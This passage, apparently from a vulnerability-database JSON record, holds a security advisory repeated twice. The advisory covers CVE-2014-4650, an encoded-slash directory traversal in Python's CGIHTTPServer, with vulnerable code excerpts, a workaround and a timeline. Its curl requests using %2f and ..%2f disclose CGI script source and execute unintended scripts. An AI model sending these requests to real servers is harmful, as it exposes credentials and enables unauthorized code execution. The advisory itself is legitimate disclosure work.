SimpleHTTPRequestHandler but can also \nrun CGI scripts. \n \n(from the Python documentation) \n \n \nMore Details \n============ \n \nThe CGIHTTPServer module can be used to set up a simple HTTP server with \nCGI scripts. A sample server script in Python may look like the \nfollowing: \n \n------------------------------------------------------------------------ \n#!/usr/bin/env python2 \n \nimport CGIHTTPServer \nimport BaseHTTPServer \n \nif __name__ == \"__main__\": \nserver = BaseHTTPServer.HTTPServer \nhandler = CGIHTTPServer.CGIHTTPRequestHandler \nserver_address = (\"\", 8000) \n# Note that only /cgi-bin will work: \nhandler.cgi_directories = [\"/cgi-bin\", \"/cgi-bin/subdir\"] \nhttpd = server(server_address, handler) \nhttpd.serve_forever() \n------------------------------------------------------------------------ \n \nThis server should execute any scripts located in the subdirectory \n\"cgi-bin\". A sample CGI script can be placed in that directory, for \nexample a script like the following: \n \n------------------------------------------------------------------------ \n#!/usr/bin/env python2 \nimport json \nimport sys \n \ndb_credentials = \"SECRET\" \nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\") \nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"})) \n------------------------------------------------------------------------ \n \nThe Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler \nclass which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler: \n \nclass SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): \n[...] \ndef do_GET(self): \n\"\"\"Serve a GET request.\"\"\" \nf = self.send_head() \nif f: \ntry: \nself.copyfile(f, self.wfile) \nfinally: \nf.close() \n \ndef do_HEAD(self): \n\"\"\"Serve a HEAD request.\"\"\" \nf = self.send_head() \nif f: \nf.close() \n \ndef translate_path(self, path): \n[...] 
\npath = posixpath.normpath(urllib.unquote(path)) \nwords = path.split('/') \nwords = filter(None, words) \npath = os.getcwd() \n[...] \n \nThe CGIHTTPRequestHandler class inherits, among others, the methods \ndo_GET() and do_HEAD() for handling HTTP GET and HTTP HEAD requests. The \nclass overrides send_head() and implements several new methods, such as \ndo_POST(), is_cgi() and run_cgi(): \n \nclass CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): \n[...] \ndef do_POST(self): \n[...] \nif self.is_cgi(): \nself.run_cgi() \nelse: \nself.send_error(501, \"Can only POST to CGI scripts\") \n \ndef send_head(self): \n\"\"\"Version of send_head that support CGI scripts\"\"\" \nif self.is_cgi(): \nreturn self.run_cgi() \nelse: \nreturn SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self) \n \ndef is_cgi(self): \n[...] \ncollapsed_path = _url_collapse_path(self.path) \ndir_sep = collapsed_path.find('/', 1) \nhead, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:] \nif head in self.cgi_directories: \nself.cgi_info = head, tail \nreturn True \nreturn False \n[...] \ndef run_cgi(self): \n\"\"\"Execute a CGI script.\"\"\" \ndir, rest = self.cgi_info \n \n[...] \n \n# dissect the part after the directory name into a script name & \n# a possible additional path, to be stored in PATH_INFO. \ni = rest.find('/') \nif i >= 0: \nscript, rest = rest[:i], rest[i:] \nelse: \nscript, rest = rest, '' \n \nscriptname = dir + '/' + script \nscriptfile = self.translate_path(scriptname) \nif not os.path.exists(scriptfile): \nself.send_error(404, \"No such CGI script (%r)\" % scriptname) \nreturn \nif not os.path.isfile(scriptfile): \nself.send_error(403, \"CGI script is not a plain file (%r)\" % \nscriptname) \nreturn \n[...] \n[...] \n \nFor HTTP GET requests, do_GET() first invokes send_head(). That method \ncalls is_cgi() to determine whether the requested path is to be executed \nas a CGI script. 
The is_cgi() method uses _url_collapse_path() to \nnormalize the path, i.e. remove extraneous slashes (/),current directory \n(.), or parent directory (..) elements, taking care not to permit \ndirectory traversal below the document root. The is_cgi() function \nreturns True when the first path element is contained in the \ncgi_directories list. As _url_collapse_path() and is_cgi() never URL \ndecode the path, replacing the forward slash after the CGI directory in \nthe URL to a CGI script with the URL encoded variant %2f leads to \nis_cgi() returning False. This will make CGIHTTPRequestHandler's \nsend_head() then invoke its parent's send_head() method which translates \nthe URL path to a file system path using the translate_path() method and \nthen outputs the file's contents raw. As translate_path() URL decodes \nthe path, this then succeeds and discloses the CGI script's file \ncontents: \n \n$ curl http://localhost:8000/cgi-bin%2ftest.py \n#!/usr/bin/env python2 \nimport json \nimport sys \n \ndb_credentials = \"SECRET\" \nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\") \nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"})) \n \nSimilarly, the CGIHTTPRequestHandler can be tricked into executing CGI \nscripts that would normally not be executable. The class normally only \nallows executing CGI scripts that are direct children of one of the \ndirectories listed in cgi_directories. Furthermore, only direct \nsubdirectories of the document root (the current working directory) can \nbe valid CGI directories. \n \nThis can be seen in the following example. Even though the sample server \nshown above includes \"/cgi-bin/subdir\" as part of the request handler's \ncgi_directories, a CGI script named test.py in that directory is not \nexecuted: \n \n$ curl http://localhost:8000/cgi-bin/subdir/test.py \n[...] \n<p>Error code 403. \n<p>Message: CGI script is not a plain file ('/cgi-bin/subdir'). \n[...]
\n \nHere, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and \nreturned True. Next, run_cgi() further dissected these paths to perform \nsome sanity checks, thereby mistakenly assuming subdir to be the \nexecutable script's filename and test.py to be path info. As subdir is \nnot an executable file, run_cgi() returns an error message. However, if \nthe forward slash between subdir and test.py is replaced with %2f, \ninvoking the script succeeds: \n \n$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py \n{\"text\": \"This is a Test\"} \n \nThis is because neither is_cgi() nor run_cgi() URL decode the path \nduring processing until run_cgi() tries to determine whether the target \nscript is an executable file. More specifically, as subdir%2ftest.py \ndoes not contain a forward slash, it is not split into the script name \nsubdir and path info test.py, as in the previous example. \n \nSimilarly, using URL encoded forward slashes, executables outside of a \nCGI directory can be executed: \n \n$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py \n{\"text\": \"This is a Test\"} \n \n \nWorkaround \n========== \n \nSubclass CGIHTTPRequestHandler and override the is_cgi() method with a \nvariant that first URL decodes the supplied path, for example: \n \nclass FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler): \ndef is_cgi(self): \nself.path = urllib.unquote(self.path) \nreturn CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self) \n \n \nFix \n=== \n \nUpdate to the latest Python version from the Mercurial repository at \nhttp://hg.python.org/cpython/ \n \n \nSecurity Risk \n============= \n \nThe vulnerability can be used to gain access to the contents of CGI \nbinaries or the source code of CGI scripts. This may reveal sensitive \ninformation, for example access credentials. This can greatly help \nattackers in mounting further attacks and is therefore considered to \npose a high risk.
Furthermore attackers may be able to execute code that \nwas not intended to be executed. However, this is limited to files \nstored in the server's working directory or in its subdirectories. \n \nThe CGIHTTPServer code does contain this warning: \n\"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL\" \nEven when used on a local computer this may allow other local users to \nexecute code in the context of another user. \n \n \nTimeline \n======== \n \n2014-04-07 Vulnerability identified \n2014-06-11 Customer approved disclosure to vendor \n2014-06-11 Vendor notified \n2014-06-15 Vendor disclosed vulnerability in their public bug tracker \nand addressed it in public source code repository \n2014-06-23 CVE number requested \n2014-06-25 CVE number assigned \n2014-06-26 Advisory released \n \n \nReferences \n========== \n \nhttp://bugs.python.org/issue21766 \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests, short pentests, \nperformed by a team of specialised IT-security experts. Hereby, security \nweaknesses in company networks or products are uncovered and can be \nfixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at \nhttps://www.redteam-pentesting.de. \n \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 
25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/127241/rt-sa-2014-008.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:44", "description": "\nPython CGIHTTPServer - Encoded Directory Traversal", "edition": 1, "published": "2014-06-27T00:00:00", "title": "Python CGIHTTPServer - Encoded Directory Traversal", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4650"], "modified": "2014-06-27T00:00:00", "id": "EXPLOITPACK:35A921A81EE6FB28E829D4305BB3A08D", "href": "", "sourceData": "Advisory: Python CGIHTTPServer File Disclosure and Potential Code\n Execution\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded\npath separators in URLs. This may enable attackers to disclose a CGI\nscript's source code or execute arbitrary CGI scripts in the server's\ndocument root.\n\nDetails\n=======\n\nProduct: Python CGIHTTPServer\nAffected Versions:\n 2.7 - 2.7.7,\n 3.2 - 3.2.4,\n 3.3 - 3.3.2,\n 3.4 - 3.4.1,\n 3.5 pre-release\nFixed Versions:\n 2.7 rev b4bab0788768,\n 3.2 rev e47422855841,\n 3.3 rev 5676797f3a3e,\n 3.4 rev 847e288d6e93,\n 3.5 rev f8b3bb5eb190\nVulnerability Type: File Disclosure, Directory Traversal, Code Execution\nSecurity Risk: high\nVendor URL: https://docs.python.org/2/library/cgihttpserver.html\nVendor Status: fixed version released\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008\nAdvisory Status: published\nCVE: CVE-2014-4650\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650\n\n\nIntroduction\n============\n\nThe CGIHTTPServer module defines a request-handler class, interface\ncompatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits\nbehavior from SimpleHTTPServer. 
SimpleHTTPRequestHandler but can also\nrun CGI scripts.\n\n(from the Python documentation)\n\n\nMore Details\n============\n\nThe CGIHTTPServer module can be used to set up a simple HTTP server with\nCGI scripts. A sample server script in Python may look like the\nfollowing:\n\n------------------------------------------------------------------------\n#!/usr/bin/env python2\n\nimport CGIHTTPServer\nimport BaseHTTPServer\n\nif __name__ == \"__main__\":\n server = BaseHTTPServer.HTTPServer\n handler = CGIHTTPServer.CGIHTTPRequestHandler\n server_address = (\"\", 8000)\n # Note that only /cgi-bin will work:\n handler.cgi_directories = [\"/cgi-bin\", \"/cgi-bin/subdir\"]\n httpd = server(server_address, handler)\n httpd.serve_forever()\n------------------------------------------------------------------------\n\nThis server should execute any scripts located in the subdirectory\n\"cgi-bin\". A sample CGI script can be placed in that directory, for\nexample a script like the following:\n\n------------------------------------------------------------------------\n#!/usr/bin/env python2\nimport json\nimport sys\n\ndb_credentials = \"SECRET\"\nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\")\nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"}))\n------------------------------------------------------------------------\n\nThe Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler\nclass which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler:\n\nclass SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):\n[...]\n def do_GET(self):\n \"\"\"Serve a GET request.\"\"\"\n f = self.send_head()\n if f:\n try:\n self.copyfile(f, self.wfile)\n finally:\n f.close()\n\n def do_HEAD(self):\n \"\"\"Serve a HEAD request.\"\"\"\n f = self.send_head()\n if f:\n f.close()\n\n def translate_path(self, path):\n [...]\n path = posixpath.normpath(urllib.unquote(path))\n words = path.split('/')\n words = filter(None, words)\n path = os.getcwd()\n 
[...]\n\nThe CGIHTTPRequestHandler class inherits, among others, the methods\ndo_GET() and do_HEAD() for handling HTTP GET and HTTP HEAD requests. The\nclass overrides send_head() and implements several new methods, such as\ndo_POST(), is_cgi() and run_cgi():\n\nclass CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n[...]\n def do_POST(self):\n [...]\n if self.is_cgi():\n self.run_cgi()\n else:\n self.send_error(501, \"Can only POST to CGI scripts\")\n\n def send_head(self):\n \"\"\"Version of send_head that support CGI scripts\"\"\"\n if self.is_cgi():\n return self.run_cgi()\n else:\n return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)\n\n def is_cgi(self):\n [...]\n collapsed_path = _url_collapse_path(self.path)\n dir_sep = collapsed_path.find('/', 1)\n head, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:]\n if head in self.cgi_directories:\n self.cgi_info = head, tail\n return True\n return False\n[...]\n def run_cgi(self):\n \"\"\"Execute a CGI script.\"\"\"\n dir, rest = self.cgi_info\n\n [...]\n\n # dissect the part after the directory name into a script name &\n # a possible additional path, to be stored in PATH_INFO.\n i = rest.find('/')\n if i >= 0:\n script, rest = rest[:i], rest[i:]\n else:\n script, rest = rest, ''\n\n scriptname = dir + '/' + script\n scriptfile = self.translate_path(scriptname)\n if not os.path.exists(scriptfile):\n self.send_error(404, \"No such CGI script (%r)\" % scriptname)\n return\n if not os.path.isfile(scriptfile):\n self.send_error(403, \"CGI script is not a plain file (%r)\" %\n scriptname)\n return\n [...]\n[...]\n\nFor HTTP GET requests, do_GET() first invokes send_head(). That method\ncalls is_cgi() to determine whether the requested path is to be executed\nas a CGI script. The is_cgi() method uses _url_collapse_path() to\nnormalize the path, i.e. remove extraneous slashes (/),current directory\n(.), or parent directory (..) 
elements, taking care not to permit\ndirectory traversal below the document root. The is_cgi() function\nreturns True when the first path element is contained in the\ncgi_directories list. As _url_collapse_path() and is_cgi() never URL\ndecode the path, replacing the forward slash after the CGI directory in\nthe URL to a CGI script with the URL encoded variant %2f leads to\nis_cgi() returning False. This will make CGIHTTPRequestHandler's\nsend_head() then invoke its parent's send_head() method which translates\nthe URL path to a file system path using the translate_path() method and\nthen outputs the file's contents raw. As translate_path() URL decodes\nthe path, this then succeeds and discloses the CGI script's file\ncontents:\n\n$ curl http://localhost:8000/cgi-bin%2ftest.py\n#!/usr/bin/env python2\nimport json\nimport sys\n\ndb_credentials = \"SECRET\"\nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\")\nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"}))\n\nSimilarly, the CGIHTTPRequestHandler can be tricked into executing CGI\nscripts that would normally not be executable. The class normally only\nallows executing CGI scripts that are direct children of one of the\ndirectories listed in cgi_directories. Furthermore, only direct\nsubdirectories of the document root (the current working directory) can\nbe valid CGI directories.\n\nThis can be seen in the following example. Even though the sample server\nshown above includes \"/cgi-bin/subdir\" as part of the request handler's\ncgi_directories, a CGI script named test.py in that directory is not\nexecuted:\n\n$ curl http://localhost:8000/cgi-bin/subdir/test.py\n[...]\n<p>Error code 403.\n<p>Message: CGI script is not a plain file ('/cgi-bin/subdir').\n[...]\n\nHere, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and\nreturned True.
Next, run_cgi() further dissected these paths to perform\nsome sanity checks, thereby mistakenly assuming subdir to be the\nexecutable script's filename and test.py to be path info. As subdir is\nnot an executable file, run_cgi() returns an error message. However, if\nthe forward slash between subdir and test.py is replaced with %2f,\ninvoking the script succeeds:\n\n$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py\n{\"text\": \"This is a Test\"}\n\nThis is because neither is_cgi() nor run_cgi() URL decode the path\nduring processing until run_cgi() tries to determine whether the target\nscript is an executable file. More specifically, as subdir%2ftest.py\ndoes not contain a forward slash, it is not split into the script name\nsubdir and path info test.py, as in the previous example.\n\nSimilarly, using URL encoded forward slashes, executables outside of a\nCGI directory can be executed:\n\n$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py\n{\"text\": \"This is a Test\"}\n\n\nWorkaround\n==========\n\nSubclass CGIHTTPRequestHandler and override the is_cgi() method with a\nvariant that first URL decodes the supplied path, for example:\n\nclass FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler):\n def is_cgi(self):\n self.path = urllib.unquote(self.path)\n return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self)\n\n\nFix\n===\n\nUpdate to the latest Python version from the Mercurial repository at\nhttp://hg.python.org/cpython/\n\n\nSecurity Risk\n=============\n\nThe vulnerability can be used to gain access to the contents of CGI\nbinaries or the source code of CGI scripts. This may reveal sensitive\ninformation, for example access credentials. This can greatly help\nattackers in mounting further attacks and is therefore considered to\npose a high risk. Furthermore attackers may be able to execute code that\nwas not intended to be executed.
However, this is limited to files\nstored in the server's working directory or in its subdirectories.\n\nThe CGIHTTPServer code does contain this warning:\n\"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL\"\nEven when used on a local computer this may allow other local users to\nexecute code in the context of another user.\n\n\nTimeline\n========\n\n2014-04-07 Vulnerability identified\n2014-06-11 Customer approved disclosure to vendor\n2014-06-11 Vendor notified\n2014-06-15 Vendor disclosed vulnerability in their public bug tracker\n and addressed it in public source code repository\n2014-06-23 CVE number requested\n2014-06-25 CVE number assigned\n2014-06-26 Advisory released\n\n\nReferences\n==========\n\nhttp://bugs.python.org/issue21766\n\n\nRedTeam Pentesting GmbH\n=======================\n\nRedTeam Pentesting offers individual penetration tests, short pentests,\nperformed by a team of specialised IT-security experts. Hereby, security\nweaknesses in company networks or products are uncovered and can be\nfixed immediately.\n\nAs there are only few experts in this field, RedTeam Pentesting wants to\nshare its knowledge and enhance the public knowledge with research in\nsecurity related areas. The results are made available as public\nsecurity advisories.\n\nMore information about RedTeam Pentesting can be found at\nhttps://www.redteam-pentesting.de.\n\n\n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0\nDennewartstr. 25-27 Fax : +49 241 510081-99\n52068 Aachen https://www.redteam-pentesting.de\nGermany Registergericht: Aachen HRB 14004\nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}